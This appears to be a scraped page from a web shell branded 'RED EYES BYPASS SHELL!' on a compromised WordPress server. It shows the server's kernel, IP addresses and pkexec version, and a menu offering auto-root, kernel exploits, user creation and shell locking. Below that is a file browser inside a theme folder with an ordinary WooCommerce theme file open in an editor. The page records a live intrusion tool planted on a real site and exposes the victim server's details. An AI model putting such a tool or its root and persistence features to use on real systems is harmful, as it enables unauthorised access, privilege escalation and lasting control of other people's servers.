Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
sdgs /
wp-content /
themes /
blossom-spa /
inc /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
css
[ DIR ]
drwxr-xr-x
custom-controls
[ DIR ]
drwxr-xr-x
customizer
[ DIR ]
drwxr-xr-x
dashboard
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
tgmpa
[ DIR ]
drwxr-xr-x
class-webfont-loader.php
18.77
KB
-rwxr-xr-x
custom-functions.php
24.02
KB
-rwxr-xr-x
extras.php
61.23
KB
-rwxr-xr-x
fontawesome.php
43.45
KB
-rwxr-xr-x
metabox.php
4.94
KB
-rwxr-xr-x
partials.php
6.68
KB
-rwxr-xr-x
template-functions.php
22.55
KB
-rwxr-xr-x
toolkit-functions.php
6
KB
-rwxr-xr-x
typography.php
13.36
KB
-rwxr-xr-x
widgets.php
3.5
KB
-rwxr-xr-x
woocommerce-functions.php
2.81
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : woocommerce-functions.php
<?php /** * Blossom Spa Woocommerce hooks and functions. * * @link https://docs.woothemes.com/document/third-party-custom-theme-compatibility/ * * @package Blossom_Spa */ /** * Woocommerce related hooks */ remove_action( 'woocommerce_before_main_content', 'woocommerce_breadcrumb', 20, 0 ); remove_action( 'woocommerce_before_main_content', 'woocommerce_output_content_wrapper', 10 ); remove_action( 'woocommerce_after_main_content', 'woocommerce_output_content_wrapper_end', 10 ); remove_action( 'woocommerce_sidebar', 'woocommerce_get_sidebar', 10 ); /** * Declare Woocommerce Support */ function blossom_spa_woocommerce_support() { global $woocommerce; add_theme_support( 'woocommerce', array( 'gallery_thumbnail_image_width' => 300, ) ); if( version_compare( $woocommerce->version, '3.0', ">=" ) ) { add_theme_support( 'wc-product-gallery-zoom' ); add_theme_support( 'wc-product-gallery-lightbox' ); add_theme_support( 'wc-product-gallery-slider' ); } } add_action( 'after_setup_theme', 'blossom_spa_woocommerce_support'); /** * Woocommerce Sidebar */ function blossom_spa_wc_widgets_init(){ register_sidebar( array( 'name' => esc_html__( 'Shop Sidebar', 'blossom-spa' ), 'id' => 'shop-sidebar', 'description' => esc_html__( 'Sidebar displaying only in woocommerce pages.', 'blossom-spa' ), 'before_widget' => '<section id="%1$s" class="widget %2$s">', 'after_widget' => '</section>', 'before_title' => '<h2 class="widget-title">', 'after_title' => '</h2>', ) ); } add_action( 'widgets_init', 'blossom_spa_wc_widgets_init' ); /** * Before Content * Wraps all WooCommerce content in wrappers which match the theme markup */ function blossom_spa_wc_wrapper(){ ?> <div id="primary" class="content-area"> <main id="main" class="site-main" role="main"> <?php } add_action( 'woocommerce_before_main_content', 'blossom_spa_wc_wrapper' ); /** * After Content * Closes the wrapping divs */ function blossom_spa_wc_wrapper_end(){ ?> </main> </div> <?php do_action( 'blossom_spa_wo_sidebar' ); } add_action( 'woocommerce_after_main_content', 'blossom_spa_wc_wrapper_end' ); /** * Callback function for Shop sidebar */ function blossom_spa_wc_sidebar_cb(){ if( is_active_sidebar( 'shop-sidebar' ) ){ echo '<aside id="secondary" class="widget-area" role="complementary" itemscope itemtype="http://schema.org/WPSideBar">'; dynamic_sidebar( 'shop-sidebar' ); echo '</aside>'; } } add_action( 'blossom_spa_wo_sidebar', 'blossom_spa_wc_sidebar_cb' ); /** * Removes the "shop" title on the main shop page */ add_filter( 'woocommerce_show_page_title' , '__return_false' );
Close